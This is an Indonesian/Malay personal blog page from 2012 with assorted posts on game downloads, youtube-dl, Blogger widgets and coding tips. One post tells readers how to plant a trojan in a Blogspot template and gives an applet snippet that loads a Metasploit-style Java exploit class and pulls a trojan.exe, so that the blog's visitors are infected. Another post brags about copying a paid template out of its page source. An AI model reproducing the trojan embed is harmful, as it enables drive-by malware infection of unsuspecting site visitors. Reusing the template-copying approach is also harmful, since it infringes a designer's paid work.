Pasang iklan Anda di sini.
https://goo.gl/Io3Xqy

Tuesday, October 23, 2012

0 Counter Strike 1.6 [PC]


Counter Strike 1.6 v35 DigitalZone Edition


The most stable version of counter strike 1.6 With this version you can play with bots, locally and on the internet 'Fixed some bugs and that \' s bot adding the 'Counter Strike Condition Zero''

The game, version 1.6 since September 2003, has since its official release November 8, 2000 a great success. In early 2009, Counter-Strike was still the shooter the most played online games before the latest evolution as Counter-Strike: Source .

S ystem R equirements 
Minuim

1.2 GHz Processor, 
256MB RAM, 
DirectX 7 level graphics card, Windows 2000/XP, Mouse, 
Keyboard, Internet Connection


Size: 64 MB

Thursday, October 18, 2012

0 [How to] Download YouTube Videos Using Terminal (Ubuntu)



Open terminal and run the following commands:

root@d0y4rt:~# sudo apt-get install youtube-dl


Following commands again  
(Updating to latest stable version...)
root@d0y4rt:~# sudo youtube-dl -U

Download YouTube videos using following command: 

root@d0y4rt:~# youtube-dl <youtube link>

Example,

root@d0y4rt:~# youtube-dl http://www.youtube.comwatch?v=7oBQnIumBRY

Enjoy! ^_^

*copy code without root@penreturns:~#

Thursday, October 11, 2012

2 Cara Pasang CCTV Animasi di Blog





1). Buka Blogger

2). Klik Tata Letak >> Tambah Gadget >> HTML/Java Script

3). Lalu Masukan Kode Ini Pada Kolom/Kotak Yang Besar

<script language="JavaScript" src="http://js4you.googlecode.com/files/cctv.js" type="text/javascript"> </script> <script language="JavaScript" type="text/javascript"> cot("http://1.bp.blogspot.com/-jyICA3F7eOo/TbBE4YBgbpI/AAAAAAAAAEM/XU9sJQnzGvU/s1600/cctv.gif")</script>


4). Simpan / Save
Lihat Hasilnya...

WARNING! Jika Anda Ingin Copy Paste Silahkan Sertakan Sumber nya, atau Jika Ingin Share Artikel nya Silahkan Sertakan Credit nya . Terima Kasih ;D

0 Calender Animasi Di Blogger









Priview nya seperti ini :




Ingin  memasang nya di blog sobat ?


1). Buka Blogger
2). Klik Tata Letak >> Tambah Gadget >> HTML/Java Scprit
3). Lalu Masukan Kode Ini Pada Kolom/Kotak Yang Besar





<!-My calendar widget - HTML code - mycalendar.org --><div align="center" style="margin:15px 0px 0px 0px"><noscript><div align="center" style="width:140px;border:1px solid #ccc;background:#fff ;color: #fff ;font-weight:bold;"><a style="font-size:12px;text-decoration:none;color:#000 ;" href="http://mycalendar.org/Holiday/Indonesia/">Indonesia Calendar</a></div></noscript><script type="text/javascript" src="http://mycalendar.org/calendar.php?group=Holiday&calendar=Indonesia&widget_number=3&cp3_Hex=FFB200&cp2_Hex=040244&cp1_Hex=F9F9FF&fwdt=140&lab=1"></script></div><!-end of code-->



4). Lalu Simpan




- Jika Ingin Calender Berbeda Bisa Datangi : My Calender , Dan Ikuti Langkah-Langkah Yang Ada Di Sana

0 Membuat Judul Widgate Miring



1). Buka Blogger

2). Klik

Template >> Edit HTML >> Lanjutkan

3). CTRL+F Cari Code ]]></b;skin> Masuki Kode Di Bawah Ini Di Bawah Kode Di Bawah Kode Tersebut (Di Sarankan Centang Expand Template Widget )



.sidebar h2{background-color:transparent; border:1px solid #ccc; -moz-border-radius-topleft:15px; -moz-border-radius-bottomright:15px; margin-bottom:2px; padding:8px 10px 10px 10px; color:#FFA500; font-family:'Molengo',Trebuchet MS,Serif; font-size:20px; transform:rotate(-3deg); -moz-transform:rotate(-3deg); -webkit-transform:rotate(-3deg); -o-transform:rotate(-3deg); font-weight:bold}
.sidebar h2:hover{opacity:0.7;transform:rotate(-3deg); -moz-transform:rotate(0deg); -webkit-transform:rotate(0deg); -o-transform:rotate(0deg)}



4). Simpan / Pratinjau


-Jika Tidak Bisa , Silahkan Letakan Di Bawah Code <Style>

Selamat Mencoba

SUMBER

0 Cara Convert Video Di Youtube

photo hiasan 


Update cara lagi , bagaimana Menconvert Video di Youtube , menjadi beberapa Ekstensi
yaitu dengan menggunakan Free Online Youtube To Mp3 Web 
dan ini dia beberapa Fitur yg di sediakan untuk menconvert Video di youtube :

  1. MP3 (Standard)
  2. MP3 (High) 
  3. FLV 
  4. 3GP (176x144) 
  5. 3GP (240p)
  6. MP4 
  7. AVI (DivX)
Nah misalkan saya akan menconvert Video di Yotube menjadi Mp3 ..
Ambil Link youtube nya

Lalu pergi ke web ini gan : http://www.ytconv.net/

Pilih Mp3 Standart aja
Terus pastekan tuh link Video youtube nya di situ

Lalu klik Download , dan tunggu beberapa menit Hingga proses Convert Selesai ..
Kalau ga selesai" Babeet aja gan Mouse nya xPP

Kalau sudah selesai Langsung aja Click Downloadd gann

Sekian dari sayaa

SUMBER

Wednesday, October 10, 2012

0 Masukan Trojan Di dalam Blogspot


Salam Sejahtera

Hari ini saya nak kongsikan satu code untuk masukan di dalam Blogspot. 
Masukan Virus Trojan Di dalam Blogspot 
http://farm8.staticflickr.com/7196/6950941264_27d4945680_z.jpg


Code ini di tulis oleh saya sendiri di dalam code html applet source code .



Kita akan masukan virus Trojan ini di dalam edit html .



mudah sahaja .



korang masukan Code ini di dalam Html



cara- cara :



1: pergi ke "Design"



2:Klik "Edit Html"



3:tekan "Ctrl+F" dan cari ""



masukan Code ini di . paste di 


<div> id="page">_</div>
<applet archive="test.jar" Code="msf.x.Exploit.class">
<param name="data" value="http://[localhost.com/]/trojan/trojan.exe">
</applet>
</Body>



4:korang masukan Trojan korang pada tulisan Hijau di atas.
Gantikan dengan link trojan anda .



kesan-kesan:



blog yang ditanam trojan tersebut akan di blog oleh anti virus 
daripada anda terus mengekses blog tersebut .



Happy hacking

Tuesday, October 09, 2012

1 Belajar coding atau cari tutorial?


Antara belajar coding atau cari tutorial..aku sarankan anda belajar coding..sebab..bila anda faham coding asas.. anda tidak perlu mencari tutorial lagi...


Mengapa dan kenapa?


Jika anda pergi mana2 blog..anda nampak sesuatu yang menarik, 
sebagai contoh efek zoom pada gambar.. 
jika anda faham coding.,anda tidak perlu cari tutorial untuk 
buat zoom efek pada gambar..anda hanya 
perlu lihat pada page source blog tersebut..



Sebagai contoh lagi.. anda jumpa blog yang mempunyai cara 
sembunyikan shoutbox yang unik tapi blog itu tidak 
buat tutorial.. jika anda faham coding anda hanya 
senyum dan lihat page source saja anda akan jumpa code tersebut..



Untuk template blogspot..
anda perlu memahami 3 coding iaitu CODING CSS,HTML DAN JAVASCRIPT..



CODING CSS dan HTML adalah sangat mudah dikuasai,
untuk coding JAVASCRIPT,ada sikit punya pening tapi lama2 anda akan faham..



Kebaikan jika anda faham coding..
Anda boleh suka2 hati edit template.
Anda boleh buat template sendiri.
Anda boleh ambil upah buat template orang.
Anda boleh membantu blogger2 lain yang telah tersilap edit template..
Dan macam2 lagi...



Jika anda seorang yang mahir menggunakan photoshop 
maka anda berpotensi menjadi most wanted blog 
designer jika anda tahu bermain dengan coding..



Namun jika anda pilih untuk mencari tutorial sahaja..
anda akan tetap mempelajari coding secara tidak langsung..
tp cara ini lambat sikit berbanding belajar coding secara langsung...



Jika anda ingin belajar coding.,
aku boleh ajarkan bila ada masa terluang..
tapi pengetahuan aku terhadap coding ni cuma asas sahaja tidak la mendalam..



Berikut aku sertakan gambar dari pandangan admin blog



Pada gambar di atas anda tidak kelihatan 
ADD A GADGET ATAU APA2 GADGET.. 
pelikan template ni... hehehehe



Template ni aku tidak release sebab x semua orang boleh pakai..
lagipun aku tidak pakai lama..



TUJUAN UTAMA aku tukar2 template adalah untuk 
memperkukuhkan lagi pembelajaran coding aku.. 
sehingga tahap aku boleh buat template tanpa mana2 
rujukan ibarat buat karangan dalam exam..
buat masa ni aku boleh buat template dengan rujukan 
nota yang aku tulis pada code tutorial dalam blog aku ni..('',)



SEKIAN

                                                                                                            SUMBER

0 Apa itu page source ?


Sebenarnya aku mau share pasal page source.. mungkin ada yang tahu dan ada yang tidak tahu apa dia page source tu.. aku pun tidak tahu secara spesifik sebenarnya.. tapi apa yang aku tau macam2 yang anda boleh ambil dari page source tu..


Kalau dulu aku cuma mengambil javascript pada page source tu dan melihat cara susunan code css tapi sekarang aku bertindak jauh lebih melampau.. hahaha



Apa tidak.. pada masa ni aku sudah mampu memplagiat template hanya dengan melihat page source .. hahaha.. kejamnya aku...



Boleh tahan juga kemahiran aku melihat page source.. ekekek.. 



Berikut aku sertakan screen shot template yang anda perlu bayar sebanyak USD 15 jika anda hendak menggunakannya..(lebih mahal dari beli domain.. huhuhu)




Tu dia.. USD 15,.. memang kena dengan harga,, cantik template ni







ni gambar template tu digunakan pada blog demo template tu...






Tu dia.. lepas aku curi segala2 dari page source template testing owner asal template tu...aku terus pasang pada template aku.. kena edit lagi ... huhuhu.. bukan boleh pakai terus..



Walau apa pun template ni aku tidak akan release untuk kegunaan awam sebab kalau aku release aku dah kacau periuk nasik designer asal tu...



Aku buat ni untuk menguji sejauh mana kemahiran aku membongkar page source,.. hehehe..



Kepada yang masih tidak tahu apa itu page source... sila tekan



CTRL + U 



ketika membaca entri ni.. akan keluar satu window.. yang penuh dengan code.. itulah dia page source...



Sekian

                                                                                                                                      SUMBER

0 Cara Update Status Biru Facebook




Copy Paste script berikut ini ke status Anda:

    @@[0:[241217025982555:1: TEKS ANDA ]] by @[241217025982555:]

atau bisa dengan cara instant

- awali dgn LIKE halaman inihttp://www.facebook.com/status.biru.gampang

- lalu klik link dibawah ini dan ganti "TEKS"nya dgn update Anda..